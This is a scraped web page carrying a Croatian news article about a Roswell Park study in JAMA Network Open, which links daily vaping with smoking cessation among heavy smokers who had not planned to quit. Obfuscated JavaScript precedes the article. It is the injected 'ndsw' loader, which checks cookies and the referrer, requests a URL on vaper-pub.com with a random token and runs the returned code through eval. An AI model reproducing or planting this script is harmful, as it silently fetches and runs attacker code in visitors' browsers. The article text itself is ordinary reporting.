;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Dugoročna studija potvrđuje – Uz e-cigarete i oni najteži pušači prestaju pušiti

Dugoročna studija koju su proveli istraživači iz Roswell Park Comprehensive Cancer Center otkrila je da odrasli teški pušači koji ne planiraju prestati pušiti imaju veću vjerojatnost da će uspjeti ako pređu na e-cigarete.

Nedavno objavljena u JAMA Network Openu, studija pod naslovom “Povezanost upotrebe e-cigareta s prestankom pušenja cigareta među odraslim pušačima koji u početku nikada nisu planirali prestati“, koristila je podatke od 2014. do 2019. kao dio Population Assessment of Tobacco and Health (PATH) istraživanja, dugoročnog istraživanja koje se bavi korištenjem duhana i povezanim zdravstvenim obrascima u SAD-u.

Nalazi iz Vala 1 studije objavljene 2016. već su razriješili određene pogrešne predodžbe o vapingu, poput zloglasne teorije da su e-cigarete samo ulazak u svijet pušenja i da ljudi koji ih počnu koristiti kad-tad prelaze na klasične cigarete. Kad su istraživači usredotočili svoju analizu na odabranu skupinu od 1600 pušača koji nisu planirali prestati pušiti i nisu koristili e-cigarete kada je studija počela, otkrili su da su oni koji su nastavili svakodnevno pariti bili oni koji su uspjeli prestati.

“Ova otkrića mijenjaju paradigmu, jer podaci sugeriraju da bi vaping zapravo mogao pomoći ljudima koji ne pokušavaju aktivno prestati pušiti. Većina drugih studija usmjerena je isključivo na ljude koji aktivno pokušavaju prestati pušiti, ali ova studija sugerira da možda propuštamo učinke e-cigareta ne uzimajući u obzir ovu skupinu pušača s ograničenom namjerom da prestanu pušiti; skupina koja je često izložena najvećem riziku od loših zdravstvenih ishoda zbog pušenja cigareta,” rekao je dr. Andrew Hyland, predsjedavajući odjela za zdravstveno ponašanje u Roswell Park Comprehensive Cancer Center.

Studija je objavila da je samo oko 6% svih pušača uključenih u ispitivanje potpuno prestalo pušiti, ali stope su bile značajno više među onima koji su svakodnevno parili, 28%. “Iako klinička ispitivanja pokazuju snažne dokaze da vaping može pomoći ljudima da prestanu pušiti, nalazi populacijskih studija u stvarnom svijetu su mješoviti”, rekla je glavna autorica studije dr. Karin Kasza, znanstvenica u Odjelu za zdravstveno ponašanje u Roswell Parku. “Naša je studija identificirala pozitivnu povezanost između svakodnevnog parenja i prestanka pušenja posebno među segmentom pušača koji nisu planirali prestati, u skladu s podacima iz kliničkih ispitivanja.”

Choose your Reaction!
Leave a Comment